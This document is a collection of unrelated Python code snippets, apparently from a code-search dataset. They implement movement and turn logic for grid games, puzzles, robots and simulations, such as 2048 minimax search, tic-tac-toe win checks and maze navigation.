[(3,0),(3,1),(3,2),(3,3),(2,3),(2,2),(2,1),(2,0),\n (1,0),(1,1),(1,2),(1,3),(0,3),(0,2),(0,1),(0,0)]\n Path2 = [(3,0),(2,0),(1,0),(0,0),(0,1),(1,1),(2,1),(3,1),\n (3,2),(2,2),(1,2),(0,2),(0,3),(1,3),(2,3),(3,3)]\n valDict = {}\n for n in range(16):\n valDict[Path1[n]] = state.getCellValue(Path1[n])\n for n in range(16):\n if n%3 == 0:\n self.emergency()\n cell1 = valDict.get(Path1[n])\n cell2 = valDict.get(Path2[n])\n score1 += (cell1) * (r**n)\n score2 += (cell2) * (r**n)\n return max(score1,score2)\n\n\n def Maximize(stateTup,A,B):\n \"\"\"\n Returns a tuple of state,eval(state)\n Takes in a stateTup(tuple of grid + depth of the grid), alpha,\n and beta\n \"\"\"\n self.emergency()\n t = Terminal(stateTup)\n if t != None:\n return (None, t)\n\n maxChild , maxUtility = None,-999999999\n state = stateTup[0]\n Map = self.dict.get(str(state.map))\n if Map == None:\n children = []\n for M in range(4):\n g = state.clone()\n if g.move(M):\n children.append(g)\n self.dict[str(state.map)] = children\n else:\n children = Map\n for child in children:\n childTup = (child,stateTup[1]+1)\n utility = Minimize(childTup,A,B)[1]\n if utility > maxUtility:\n maxChild , maxUtility = child , utility\n if maxUtility >= B:\n# global 
prune\n# prune +=1\n break\n if maxUtility > A:\n A = maxUtility\n\n return (maxChild,maxUtility)\n\n\n def Minimize(stateTup,A,B):\n \"\"\"\n Returns a tuple of state,eval(state)\n Takes in a stateTup(tuple of grid + depth of the grid), alpha,\n and beta\n \"\"\"\n self.emergency()\n t = Terminal(stateTup)\n if t != None:\n return (None, t)\n\n minChild , minUtility = None,999999999\n state = stateTup[0]\n Map= self.dict.get(str(state.map))\n if Map == None:\n cells= state.getAvailableCells()\n children = []\n tiles = [2,4]\n for i in cells:\n for j in tiles:\n g = state.clone()\n g.insertTile(i,j)\n children.append(g)\n self.dict[str(state.map)] = children\n else:\n children = Map\n for child in children:\n childTup = (child,stateTup[1]+1)\n utility = Maximize(childTup,A,B)[1]\n if utility < minUtility:\n minChild , minUtility = child , utility\n if minUtility <= A:\n# global prune\n# prune +=1\n break\n if minUtility < B:\n B = minUtility\n\n return (minChild,minUtility)\n\n\n\n def decision(grid):\n \"\"\"\n Decision function which returns the move which led to the state\n \"\"\"\n child = Maximize((grid,0),-999999999,999999999)[0]\n Child = child.map\n g = grid.clone()\n for M in range(4):\n if g.move(M):\n if g.map == Child:\n # global prune\n # global pruneLog\n # pruneLog.append(prune)\n # print(prune)\n # print(sum(pruneLog)/len(pruneLog))\n return M\n g = grid.clone()\n\n self.dict = {}\n self.h = {}\n self.prevTime = time.clock()\n self.depthLimit = 1\n self.mL = []\n self.over = False\n while self.over == False:\n self.depthLimit +=1\n try :\n self.mL.append(decision(grid))\n\n except KeyError:\n# print(self.depthLimit)\n return self.mL[-1]\n except IndexError:\n return random.randint(0,3)\n self.Alarm(time.clock())\n return self.mL[-1]", "def move_robot(room, direction):\r\n\r\n robot_row, robot_col = robot_location(room)\r\n\r\n intended_row = robot_row\r\n intended_col = robot_col\r\n\r\n if direction == \"right\":\r\n intended_col = robot_col + 1\r\n elif direction == \"left\":\r\n intended_col = robot_col - 1\r\n elif direction == \"up\":\r\n intended_row = robot_row - 1\r\n elif direction == \"down\":\r\n intended_row = robot_row + 1\r\n\r\n if room[intended_row][intended_col] != \"obstacle\":\r\n room[intended_row][intended_col] = \"robot\"\r\n room[robot_row][robot_col] = \"empty\"\r\n\r\n return room", "def pathfinder(starting_position: tuple, target_position: tuple, grid: np.ndarray) -> List[tuple] or None:\n moves_dict = {(1, 0): \"DOWN\", (-1, 0): \"UP\", (0, 1): \"RIGHT\", (0, -1): \"LEFT\"}\n\n moves = []\n path = []\n dead_ends = []\n\n def rate_position(current, target):\n \"\"\"\n Helper function to calculate distance to target\n \"\"\"\n return (target[0] - current[0]) ** 2 + (target[1] - current[1]) ** 2\n\n # Setting starting position\n current_position = starting_position\n while current_position != target_position:\n possible_moves = {}\n # Checking for each possible move and rating them\n for m in moves_dict.keys():\n if check_valid_move(grid, current_position, m):\n new_position = tuple(np.add(current_position, m))\n new_position_rating = rate_position(new_position, target_position)\n if new_position not in path and new_position not in dead_ends:\n possible_moves[new_position_rating] = m\n\n # if there are possible move, select the one, that would move us the closest to target\n if possible_moves:\n path.append(current_position) # save position to path\n moves.append(possible_moves[min(possible_moves)]) # save move to move list\n current_position = 
tuple(np.add(current_position, possible_moves[min(possible_moves)]))\n # if not, go back one move and add current position to dead ends\n else:\n # if no moves available from the start, return None\n if current_position == starting_position:\n return None\n dead_ends.append(current_position) # save position to dead ends\n current_position = path[-1] # move back one step\n path.pop(-1) # delete step from path\n moves.pop(-1) # delete move from move list\n\n return [tuple(moves_dict[move] for move in moves)]", "def move(self, position, direction):\n i, j = position\n direction %= 360\n if direction == 0:\n return (i - 1, j)\n if direction == 90:\n return (i, j + 1)\n if direction == 180:\n return (i + 1, j)\n if direction == 270:\n return (i, j - 1)\n raise ValueError(f\"Maze.move called with bad angle = {direction}\")", "def move(self, row, col, player):\n if self.winning == True:\n return\n if player == 1:\n val = 1\n else:\n val = -1\n self.row[row] += val\n self.col[col] += val\n if row == col:\n self.diagonal += val\n n = len(self.row)\n if row + col == n - 1:\n self.antidiagonal += val\n if abs(self.row[row]) == n or abs(self.col[col]) == n or abs(self.diagonal) == n or abs(self.antidiagonal) == n:\n self.winning = True\n return player\n return 0", "def moveable(self, board):\n # horizontal\n if self.direction == \"horizontal\":\n # the position to which the car wants to move is either 1 more or 1 less column wise\n right = self.get_cols()[1] + self.size - 1\n left = self.get_cols()[0] - 1\n # check if right or left is out of the boards margins \n if right > board.width_height:\n move_left = board.positions[self.get_rows()[0]][left]\n move_right = None\n elif left < 0:\n move_right = board.positions[self.get_rows()[0]][right]\n move_left = None\n else: \n move_right = board.positions[self.get_rows()[0]][right]\n move_left = board.positions[self.get_rows()[0]][left]\n\n # try to move left and right\n if move_right == \"x\" and move_left == \"x\":\n return \"leftright\"\n elif move_right == \"x\":\n return \"right\"\n elif move_left == \"x\":\n return \"left\"\n else: \n return \"none\"\n \n # vertical\n else:\n up = self.get_rows()[0] - 1\n #print(up)\n down = self.get_rows()[1] + self.size - 1\n # check if up or down is out of the boards margins \n if up < 0:\n # no room on the board for upward movement\n move_down = board.positions[down][self.get_cols()[0]]\n move_up = None\n elif down > board.width_height:\n # no room on the board for downward movement\n move_up = board.positions[up][self.get_cols()[0]]\n move_down = None\n else:\n # both up and down are possible positions on the board\n move_up = board.positions[up][self.get_cols()[0]]\n move_down = board.positions[down][self.get_cols()[0]]\n\n # try to move up and down\n if move_down == \"x\" and move_up == \"x\":\n return \"updown\"\n elif move_up == \"x\":\n return \"up\"\n elif move_down == \"x\":\n return \"down\"\n else: \n return \"none\"", "def move(direction: str, board : list) -> list:\n board_length = len(board)\n x, y = find_empty_space(board)\n \n increment_x = 0 \n increment_y = 0\n\n if direction == Direction.Up:\n increment_x, increment_y = Coordinate.Up.value\n elif direction == Direction.Down:\n increment_x, increment_y = Coordinate.Down.value\n elif direction == Direction.Left:\n increment_x, increment_y = Coordinate.Left.value\n elif direction == Direction.Right:\n increment_x, increment_y = Coordinate.Right.value\n\n x_new = x + increment_x\n y_new = y + increment_y\n\n is_valid = is_valid_move(x_new, y_new, 
board_length)\n\n if is_valid: \n temp = board[x][y]\n board[x][y] = board[x_new][y_new]\n board[x_new][y_new] = temp\n return board\n return None", "def move(self, direction):\n moved = False\n initial_tiles = self.dir_dic[direction]\n offset = OFFSETS[direction]\n if direction == UP or direction == DOWN:\n bound = self.grid_height\n else:\n bound = self.grid_width\n for tile in initial_tiles:\n temp = [self.get_tile(tile[0] + idx*offset[0], tile[1] + idx*offset[1]) \n for idx in range(bound)]\n temp = merge(temp)\n \n for idx in range(bound):\n row = tile[0] + idx*offset[0]\n col = tile[1] + idx*offset[1]\n if self.get_tile(row, col) != temp[idx]:\n moved = True\n self.set_tile(row, col, temp[idx]) \n if moved:\n self.new_tile()", "def move_to(self, shift: Move) -> Coordinate:\n if shift.direction == \"U\":\n new_coordinate = Coordinate(x=self.x, y=self.y + shift.dist)\n elif shift.direction == \"D\":\n new_coordinate = Coordinate(x=self.x, y=self.y - shift.dist)\n elif shift.direction == \"L\":\n new_coordinate = Coordinate(x=self.x - shift.dist, y=self.y)\n elif shift.direction == \"R\":\n new_coordinate = Coordinate(x=self.x + shift.dist, y=self.y)\n else:\n raise ValueError(f\"Unknown direction: '{shift.direction}'\")\n\n return new_coordinate", "def update_direction(self, move : np.ndarray, direction: np.ndarray):\r\n pos = move.copy()\r\n \r\n\r\n pos += direction\r\n while(self.in_board(pos)):\r\n if self.board[pos[0],pos[1]] == self.turn:\r\n pos -= direction\r\n while((pos != move).any()):\r\n self.board[pos[0], pos[1]] = self.turn\r\n self.count += 1\r\n pos -= direction\r\n break\r\n\r\n elif self.board[pos[0],pos[1]] == 0:\r\n\r\n break\r\n else:\r\n pos += direction", "def get_move(self, game):\n return", "def calMove(playerLocation, nextLocation):\n move_vector = tuple(np.subtract(nextLocation, playerLocation))\n for MOVE in DIRECTION_TO_CALCULATION:\n if move_vector == DIRECTION_TO_CALCULATION[MOVE]:\n return MOVE\n return \"Not right\"", "def change_cell(self):\n\n x, mu = self.update_position_direction(self.l_edge)\n mu_mean = self.calculate_mean_mu(self.x, x, self.l_edge)\n self.update_estimators(self.l_edge, mu_mean)\n\n if self.next_cell_index == self.grid.Ncells:\n # packet escapes\n self.is_escaped = True\n self.is_active = False\n self.mu = mu\n self.x = self.cell_xr\n\n elif self.next_cell_index == -1:\n\n raise GeometryException(\"No inner boundary in homogeneous sphere\")\n\n else:\n # packet is transported into target cell\n\n self.mu = mu\n\n if self.next_cell_index > self.cell_index:\n # packet is moved one cell to the right\n\n self.x = self.grid.xl[self.next_cell_index]\n\n else:\n # packet is moved one cell to the left\n\n self.x = self.grid.xr[self.next_cell_index]\n\n # reset cell-based properties for easy access\n self.cell_index = self.next_cell_index\n self.cell_chi = self.grid.chi[self.cell_index]\n self.cell_xl = self.grid.xl[self.cell_index]\n self.cell_xr = self.grid.xr[self.cell_index]\n self.cell_dx = self.grid.dx[self.cell_index]\n self.cell_dV = self.grid.dV[self.cell_index]\n\n # recalculate distances\n self.calculate_and_set_propagation_distances()", "def move(self):\n x = y = z = 0.0\n for cell in self.cells:\n x += (cell.x)#*n\n y += (cell.y)#*n\n z += (cell.z)#*n\n np = float(len(self.cells))\n med = numpy.array([x/np,y/np,z/np])\n \n dists = []\n for cell in self.cells:\n d = (cell.x-self.x)**2+(cell.y-self.y)**2+(cell.z-self.z)**2\n d = numpy.sqrt(d)\n dists.append(d)\n #md = (cell.x-med[0])**2+(cell.y-med[1])**2+(cell.z-med[2])**2\n 
#dists[-1] = (dists[-1]+md)/2\n cell = self.cells[numpy.argmin(dists)]\n cc = numpy.array([cell.x, cell.y, cell.z])\n \n t = self.t\n if abs(self.dnp) * ( self.np-self.np_req) > 0:\n t = self.tr\n self.dcenter = (1-t)*(med-self.center + self.u*(cc-med))\n self.x,self.y,self.z = self.center = self.center + self.dcenter", "def move(self):\n vector = vectors[compass.index(self.heading)]\n x = self.position[0] + vector[0]\n y = self.position[1] + vector[1]\n self._check_move(x, self.plateau[0])\n self._check_move(y, self.plateau[1])\n return replace(self, position=(x, y))", "def op_move_postconditions(self,oldPieceCoords,newPieceCoords):\n\n # Start of new state constrution\n next_gs_board = Board.from_binary_matrix(self.board)\n next_gs_board.set_element(newPieceCoords[0], newPieceCoords[1], self.curr_player)\n next_gs_board.remove_element(oldPieceCoords[0], oldPieceCoords[1])\n next_gs_next_player = self.curr_player\n next_gs_next_move = self.FREE\n next_gs_next_pieces = set()\n\n new_gs = Eximo(next_gs_next_player,next_gs_next_move,next_gs_next_pieces,next_gs_board)\n new_gs.last_piece = newPieceCoords\n\n # Check if moved piece has reached opposite side\n if(new_gs.reach_otherside(newPieceCoords)):\n new_gs.board.remove_element(newPieceCoords[0], newPieceCoords[1])\n new_gs.next_move = self.ADDPIECE_2\n new_gs.next_pieces = new_gs.addition_viable_tiles()\n new_gs.perform_checkup()\n\n else:\n new_gs.curr_player = self.get_enemy(self.curr_player)\n\n # Check if the next_piece checkup needs to be made\n if new_gs.curr_player == self.get_enemy(self.curr_player):\n new_gs.perform_checkup()\n\n return new_gs", "def result(self, row, col, move):\n start = (row, col)\n end = self.updateCell(row, col, move)\n\n return self.change(start, end)", "def move(self, row, col, player):\n offset = player * 2 - 3 # 1 or -1\n self.row[row] += offset\n self.col[col] += offset\n if row == col:\n self.diag += offset\n if row + col == self.n - 1:\n self.anti_diag += offset\n if self.n in [self.row[row], self.col[col], self.diag, self.anti_diag]:\n return 2\n if -self.n in [self.row[row], self.col[col], self.diag, self.anti_diag]:\n return 1\n return 0", "def change_cell(self):\n # TODO: assess whether this may partly moved into the base class\n\n x, mu = self.update_position_direction(self.l_edge)\n mu_mean = self.calculate_mean_mu(self.x, x, self.l_edge)\n self.update_estimators(self.l_edge, mu_mean)\n\n if self.next_cell_index == self.grid.Ncells:\n # packet escapes\n self.is_escaped = True\n self.is_active = False\n self.x = self.cell_xr\n\n elif self.next_cell_index == -1:\n # packets gets reflected\n\n self.x = self.cell_xl\n self.mu = -self.mu\n\n self.calculate_and_set_propagation_distances()\n\n else:\n # packet is transported into target cell\n if self.next_cell_index > self.cell_index:\n # packet is moved one cell to the right\n\n self.x = self.grid.xl[self.next_cell_index]\n\n else:\n # packet is moved one cell to the left\n\n self.x = self.grid.xr[self.next_cell_index]\n\n # reset cell-based properties for easy access\n self.cell_index = self.next_cell_index\n self.cell_chi = self.grid.chi[self.cell_index]\n self.cell_xl = self.grid.xl[self.cell_index]\n self.cell_xr = self.grid.xr[self.cell_index]\n self.cell_dx = self.grid.dx[self.cell_index]\n\n # recalculate distances\n self.calculate_and_set_propagation_distances()", "def make_move(self, board: Board) -> int:\n raise NotImplementedError", "def walk_right(self):\n if self.col_num == len(self.master_grid.matrix[0])-1 and self.row_num == 
len(self.master_grid.matrix)-1:\n return None\n if self.col_num == len(self.master_grid.matrix[0])-1:\n return Square(self.row_num+1, 0, self.master_grid)\n else:\n return Square(self.row_num, self.col_num + 1, self.master_grid)", "def computer_move(self):\n tree = LinkedBinaryTree(self)\n self.create_tree(tree)\n left_points = self._calculate_points(tree.get_left_child())\n right_points = self._calculate_points(tree.get_right_child())\n\n if left_points < right_points:\n next_board = tree.get_right_child().key\n else:\n next_board = tree.get_left_child().key\n self.board = next_board.board", "def move(x, y, direction, board):\n\n piece_at_xy = starter.get_piece(x, y, board); # Getting necessary pieces\n\n assert piece_at_xy != '*', \"Error in swipe logic\"; # Logical debug case\n valid_direction = (direction == \"left\" or\n direction == \"right\" or\n direction == \"up\" or\n direction == \"down\");\n assert valid_direction, \"Invalid direction passed in\"; # Logical debug case\n\n # The new x and y for the current piece (adjacent's current position) are stored alongside adjacent (fewer ifs + redundant code)\n if direction == \"left\":\n adjacent = (starter.get_piece(x - 1, y, board), x - 1, y);\n elif direction == \"right\":\n adjacent = (starter.get_piece(x + 1, y, board), x + 1, y);\n elif direction == \"up\":\n adjacent = (starter.get_piece(x, y - 1, board), x, y - 1);\n elif direction == \"down\":\n adjacent = (starter.get_piece(x, y + 1, board), x, y + 1);\n\n if adjacent[0] == None: # Edge of the board case (no action taken)\n return False;\n\n elif piece_at_xy != adjacent[0] and adjacent[0] != '*': # Can't combine two numbers case (no action taken)\n return False;\n\n elif adjacent[0] == '*': # Empty spot adjacent case (recursive movement in direction)\n starter.place_piece('*', x, y, board);\n starter.place_piece(piece_at_xy, adjacent[1], adjacent[2], board);\n move(adjacent[1], adjacent[2], direction, board);\n return True;\n\n elif piece_at_xy == adjacent[0]: # Adjacent same numbers case (combine them)\n starter.place_piece('*', x, y, board);\n starter.place_piece(str(int(adjacent[0]) * 2), adjacent[1], adjacent[2], board);\n move(adjacent[1], adjacent[2], direction, board);\n return True;\n\n else:\n # Logical debug case\n assert False, \"No way you should be in here. Error in move logic\";\n\n return False;", "def make_move(self, x, y):\n player = self.get_player()\n self.__grid[y][x] = player\n\n winner, win_tiles = self.check_move(self.get_player(), x, y)\n\n self.__turns_played += 1\n\n # Check if winner has been found\n if player == winner:\n loser = MarkerType(1 - winner.value)\n self.__winner = winner\n self.__loser = loser\n self.__state = GameState.WINNER\n return GameState.WINNER, winner, loser, win_tiles\n\n # Check if board is full and tie happens\n elif self.__turns_played >= Settings.SIZE_X * Settings.SIZE_Y:\n self.__state = GameState.TIE\n return GameState.TIE, MarkerType.NONE, MarkerType.NONE, []\n\n self.__turn += 1\n return GameState.PLAYING, MarkerType.NONE, MarkerType.NONE, []", "def move(self):\n\n # get the location we WOULD go to\n newX = self.xcor() + self.dx\n newY = self.ycor() + self.dy\n while (abs (newX) > self.BOX_RANGE) or (abs(newY) > self.BOX_RANGE):\n # print(\"choosing new direction... 
\",end=\"\")\n self.chooseNewDirection()\n # print(self.dx, self.dy)\n newX = self.xcor() + self.dx\n newY = self.ycor() + self.dy\n\n # now move our monster\n super().move()", "def make_move(self):\n\n # If the agent is starting a game, make an \n # initial move\n if self.get_play_status() == False: \n self.initial_move()\n return\n\n # for speeds sake, allow the reflex agent to respond to manual\n # input. comment out for automatic running.\n x = int(input('hotwire x:'))\n y = int(input('hotwire y:'))\n return self.get_game_space().set_tile(x,y,self.get_affinity())\n\n # Check wheather the the agent side is going to \n # win by making one move, make the move\n # OR\n # Check if the oponent has a compromising move \n best_move = self.victory_check()\n if best_move is None: best_move = self.counter_opponent_win()\n if best_move is None: best_move = self.counter_opponent_adv()\n if best_move is None: best_move = self.best_last_option()\n if best_move != None: \n x = best_move[0]\n y = best_move[1]\n return self.get_game_space().set_tile(x,y,self.get_affinity())", "def get_new_coordinate(x_y_coordinate: dict, move_direction: str) -> tuple:\n direction_dict = {'n': (0, -1), 's': (0, 1), 'w': (-1, 0), 'e': (1, 0)}\n x = x_y_coordinate['x'] + direction_dict[move_direction][0]\n y = x_y_coordinate['y'] + direction_dict[move_direction][1]\n return x, y", "def make_move(self, board: Board) -> int:\n move, evalutation = self.minimax(board, -math.inf, math.inf, self._depth, 1)\n return move", "def move(self, direction):\n newx = self.x\n newy = self.y\n newy += random.randint(-1, 1)\n newx += random.randint(-1, 1)\n if self.tmap.contents[newy][newx] != '#':\n self.x = newx\n self.y = newy", "def move(self, direction):\n # Store the values in the connection dictionary in a list\n self.room_num = self.current_room.connection[direction]\n\n # Check if there is a conditional movement and change the current room\n if len(self.room_num) == 1:\n self.current_room = self.rooms[int(self.room_num[0]) - 1]\n else:\n adventure.check(len(self.room_num))", "def get_gridState(self,real_state=None):\r\n if real_state is None:\r\n # convert unit back to mm\r\n r_state =[self.real_state[0],self.real_state[1],self.real_state[2]]\r\n else:\r\n r_state = real_state\r\n\r\n grid_state = [0,0,0]\r\n # assume orignal point is the center of the starting piece\r\n for i in range(2):\r\n if np.abs(real_state[i]) < (self.grid_size)/2.0:\r\n grid_state[i] =0\r\n else:\r\n # tol = round(self.grid_size/10.0, 2) #tolerance of floating point number\r\n tol =15.0 #1.5cm as tolerance\r\n grid_state[i] = int((real_state[i]-(self.grid_size)/2.0)//self.grid_size)\r\n remain = 1 if (real_state[i]-(self.grid_size)/2.0)%self.grid_size >=tol else 0\r\n grid_state[i] += remain\r\n\r\n # convert rad to degree\r\n real_angle = 180.0*(real_state[2]/math.pi)\r\n a = [abs(real_angle - i) for i in self.angle_set]\r\n i = np.argmin(a)\r\n # calculate approximate degree in grid world\r\n grid_state[2] = self.angle_set[i]\r\n # print(\"grid angle:\",grid_state[2],\"real ag:\",real_angle)\r\n\r\n # correct the degree in rad for moving\r\n # agl_rad = grid_state[2]*(math.pi/180.0)\r\n # correct_rot = -(real_state[2] - agl_rad)\r\n # sp = 100\r\n # t = (correct_rot* (math.pi/180))/sp\r\n # cur_t = time.time()\r\n # past_t = cur_t\r\n # while abs(past_t-cur_t) <=t+0.5:\r\n # self.Roomba.Move(0,sp)\r\n # cur_t = time.time()\r\n # self.Roomba.Move(0,0)\r\n\r\n return grid_state", "def move(self, board):\n # first, make your turn:\n currentState = 
board[self.x,self.y]\n turnDir = self.rule[(currentState + 1) % len(self.rule)]\n self.turn( int(turnDir) )\n # next, let's change this cell's state:\n if currentState >= len(self.rule) - 1:\n board[self.x,self.y] = 0\n else:\n board[self.x,self.y] = currentState + 1\n # and let's move:\n offsets = self.nextPositionOffset() # based on x, y, and dir\n self.x, self.y = board.move(self.x, self.y, offsets[0], offsets[1])", "def move(self):\n c = self.get_position()\n\n f = c['f']\n if f == 'NORTH':\n c['y'] += 1\n elif f == 'EAST':\n c['x'] += 1\n elif f == 'SOUTH':\n c['y'] -= 1\n elif f == 'WEST':\n c['x'] -= 1\n\n if self.valid_position(c):\n self.update_position(c)\n else:\n raise ValueError('InvalidPosition')", "def move(self, row, col, player):\n toadd = 1 if player == 1 else -1\n \n self.row[row] += toadd\n self.col[col] += toadd\n if row == col: self.diagonal += toadd\n if col == self.n - row -1 : self.antidiag += toadd\n \n if abs(self.row[row]) == self.n or abs(self.col[col]) == self.n or abs(self.diagonal) == self.n or abs(self.antidiag) == self.n:\n return player\n else:\n return 0", "def move(self, row: int, col: int, player: int) -> int:\n n = self.n\n if player == 1:\n self.rows_1[row] += 1\n self.cols_1[col] += 1\n if player == 2:\n self.rows_2[row] += 1\n self.cols_2[col] += 1\n if row == col:\n self.diag1[row] = player\n if row + col + 1 == n:\n self.diag2[row] = player\n f = 0\n g = 0\n for i in range(n):\n if self.rows_1[row] == n or self.cols_1[col] == n:\n return 1\n if self.rows_2[row] == n or self.cols_2[col] == n:\n return 2 \n if self.diag1[i] != self.diag1[0]:\n f = 1\n if self.diag2[i] != self.diag2[0]:\n g = 1\n if f == 0:\n return self.diag1[0]\n if g == 0:\n return self.diag2[0]\n return 0", "def get_move(self, game, time_left):\n legal_moves = game.get_legal_moves()\n if not legal_moves:\n return (-1, -1)\n return legal_moves[randint(0, len(legal_moves) - 1)]", "def move(self, direction):\n if direction in self.linked_rooms:\n return self.linked_rooms[direction]\n else:\n print(\"You can't go that way\")\n return self", "def test_move():\n human = Human()\n coordinates = [2, 1]\n dimensions = [3, 4]\n\n new_coordinates = human.move(coordinates, dimensions)\n\n possible_new_coordinates = [[2, 0], [3, 0], [3, 1], [3, 2], [2, 2], [1, 2], [1, 1], [1, 0]]\n\n assert new_coordinates in possible_new_coordinates", "def move(self, row, col, player):\n value = (1.5 - player) * 2\n self.rows[row] += value\n self.colums[col] += value\n if row == col:\n self.diag[0] += value\n if row + col == self.n-1:\n self.diag[1] += value\n if abs(self.rows[row]) == self.n or abs(self.colums[col]) == self.n or abs(self.diag[0]) == self.n or abs(self.diag[1]) == self.n:\n return player\n return 0", "def move_of_king_and_rook(self, from_row, from_col, to_row, to_col): \n #check whether a king or a rook initiated the move\n if(from_row == 7 and from_col == 0):\n self.wrl_moved = True\n elif(from_row == 7 and from_col == 7):\n self.wrr_moved = True\n elif(from_row == 7 and from_col == 4):\n self.wk_moved = True\n elif(from_row == 0 and from_col == 0):\n self.brl_moved = True\n elif(from_row == 0 and from_col == 7):\n self.brr_moved = True\n elif(from_row == 0 and from_col == 4):\n self.bk_moved = True\n \n #check whether either rook has been captured\n if(to_row == 7 and to_col == 0):\n self.wrl_moved = True\n elif(to_row == 7 and to_col == 7):\n self.wrr_moved = True\n elif(to_row == 0 and to_col == 0):\n self.brl_moved = True\n elif(to_row == 0 and to_col == 7):\n self.brr_moved = True", 
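The moved/captured flags tracked in the snippet above are only half the story: something must consume them when castling legality is checked. A minimal sketch of that check, assuming the flag names set by move_of_king_and_rook; can_castle and its arguments are hypothetical and not part of the original snippet:

def can_castle(self, white: bool, queenside: bool) -> bool:
    # Castling on a side stays available only while the king and that
    # side's rook have neither moved nor been captured (flags set above).
    if white:
        if self.wk_moved:
            return False
        return not (self.wrl_moved if queenside else self.wrr_moved)
    if self.bk_moved:
        return False
    return not (self.brl_moved if queenside else self.brr_moved)

A full rule check would also verify that the squares between king and rook are empty and not attacked; the flags above only cover the "has moved or been captured" half of the rule.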
"def arrowMoveObject(self, event, cell, spaces=1):\n direction = self.input.checkDirectionInput(event)\n try:\n x = cell[0]\n y = cell[1]\n except TypeError:\n print \"arrowMoveObject: cell is of type\", type(cell)\n return None\n try:\n if direction == 1:\n if y + spaces <= self.rows - 1:\n cell = (x, y+spaces)\n else:\n cell = (x, self.rows-1)\n elif direction == 2:\n if y -spaces >= 0:\n cell = (x, y-spaces)\n else:\n cell = (x, 0)\n elif direction == 3:\n if x - spaces >= 0:\n cell = (x-spaces, y)\n else:\n cell = (0, y)\n elif direction == 4:\n if x + spaces <= self.columns - 1:\n cell = (x+spaces, y)\n else:\n cell = (self.columns-1, y)\n except IndexError:\n print \"no dice\"\n return cell\n \n self.moveObject((x, y), cell)\n return cell", "def move_in_direction(self, direction):\n if direction == NORTH:\n self.__position[y] += 1\n elif direction == NORTHEAST:\n self.__position[x] += 1\n self.__position[y] += 1\n elif direction == EAST:\n self.__position[x] += 1\n elif direction == SOUTHEAST:\n self.__position[x] += 1\n self.__position[y] -= 1\n elif direction == SOUTH:\n self.__position[y] -= 1\n elif direction == SOUTHWEST:\n self.__position[x] -= 1\n self.__position[y] -= 1\n elif direction == WEST:\n self.__position[x] -= 1\n elif direction == NORTHWEST:\n self.__position[x] -= 1\n self.__position[y] += 1", "def move(self, horizontal_pos, vertical_pos):\n print(horizontal_pos, vertical_pos, MOVE_LIMITS)\n if horizontal_pos in MOVE_LIMITS and vertical_pos in MOVE_LIMITS:\n horizontal_coord = self.position[0] + horizontal_pos\n vertical_coord = self.position[1] + vertical_pos\n if self.position_in_grid_range(horizontal_coord, vertical_coord):\n self.position[0] += horizontal_pos\n self.position[1] += vertical_pos\n else:\n raise IllegalMoveException(\"Player position outside grid range {} {}\".format(vertical_coord, horizontal_coord))\n else:\n raise IllegalMoveException(\"Player moves not in range {}\".format(MOVE_LIMITS))\n return self.position", "def test_human_cannot_move_through_grid_wall(mock_random):\n mock_random.randint.return_value = 0\n human = Human()\n\n coordinates = [0, 0]\n dimensions = [4, 4]\n\n new_coordinates = human.move(coordinates, dimensions)\n assert new_coordinates == [0, 0]", "def make_move(self, move: Tuple[int, int]) -> MoveError:\n\n # Make sure our move is going to be valid\n if self.is_winner():\n return MoveError.GAME_WON\n\n elif move[0] >= self._board_size or move[0] < 0 or move[1] >= self._board_size or move[1] < 0:\n return MoveError.OUT_OF_RANGE\n\n elif self._board[move[1]][move[0]] != self.NEUTRAL_PLAYER:\n return MoveError.TAKEN\n\n # If we make it to here, then it is valid to make the move\n self._board[move[1]][move[0]] = self._players[self._current_player]\n self._number_of_moves = self._number_of_moves + 1\n self._last_move = move\n\n self._check_for_winner()\n\n # Only change who the player is if we didn't get a winner,\n # otherwise the final board's color will be wrong\n if not self.is_winner():\n self._current_player = (self._current_player + 1) % len(self._players)\n\n return MoveError.OKAY", "def get_move(self, game, time_left):\n self.time_left = time_left\n return self.minimax(game, self.search_depth)", "def updatePositionAndClean(self):\n #X direction (num. rows) wall limit is the width of rectangular room\n #Y direction (num. 
cols) wall limit is the height of rectangular room\n #So (0,0) is in bottom LEFT corner--since rows start at zero at BOTTOM, not top\n #direction works as you would think, with east at 0 or 360 degrees, 90 degrees at north,\n #180 degrees at west, and 270 degrees at south direction\n\n #so each time unit, getNewPosition in SAME direction if you don't hit the wall\n #if you hit the wall, then get a new RANDOM direction and then recalculate new position,\n #making sure it is a valid position on grid, has not already been cleaned (tile visited)\n\n #So it makes no difference which direction you are moving in--the getNewPosition() function\n #figures out mathematically what the next position is, based on grid, and you just have to\n #determine whether you have hit the wall in that same direction--don't have to look at the\n #number the degrees or radians in that particular direction--just moving in same direction,\n #get next position, do you hit the wall, if so get new random direction, move that way, if you\n #won't hit a wall that way.\n\n #If you don't hit a wall when you calculate a new direction, but the tile is clean already, then\n #just go through the tiles and find one that is not clean yet, and move in the same direction.\n \n robotPos = self.getRobotPosition()\n posx = robotPos.getX()\n posy = robotPos.getY()\n posx = math.floor(posx)\n posy = math.floor(posy)\n #First check if this position is clean:\n #if (self.room.isTileCleaned(posx,posy) == False):\n #then clean this tile!\n #self.room.cleanTileAtPosition(robotPos)\n #Now see where to move robot next on floor and clean that tile if it is not clean\n #So first try moving in same direction--will you hit a wall?\n newPos = self.position.getNewPosition(self.direction,self.speed)\n newPosx = newPos.getX()\n newPosy = newPos.getY()\n newPosx = math.floor(newPosx)\n newPosy = math.floor(newPosy)\n if (self.room.isPositionInRoom(newPos)) and (self.room.isTileCleaned(newPosx,newPosy) == False):\n #position is in room AND the tile has NOT been visited yet--since it's still DIRTY\n #Should NOT have to check whether you hit a wall, since new position is in room\n #so NO NEW DIRECTION needed yet--move in SAME direction\n self.setRobotPosition(newPos)\n self.room.cleanTileAtPosition(newPos)\n #print \"Moved in SAME DIRECTION I was moving in last time, direction = \" + str(self.direction)\n else: # (self.room.isPositionInRoom(newPos) == False) or (self.room.isTileCleaned(newPosx, newPosy) == True):\n # either HIT WALL -- OR -- tile already cleaned -- so calculate new RANDOM direction\n\n #NOTE: this works until you are surrounded by tiles that have no next step tile that has not already been\n #cleaned?\n #?? 
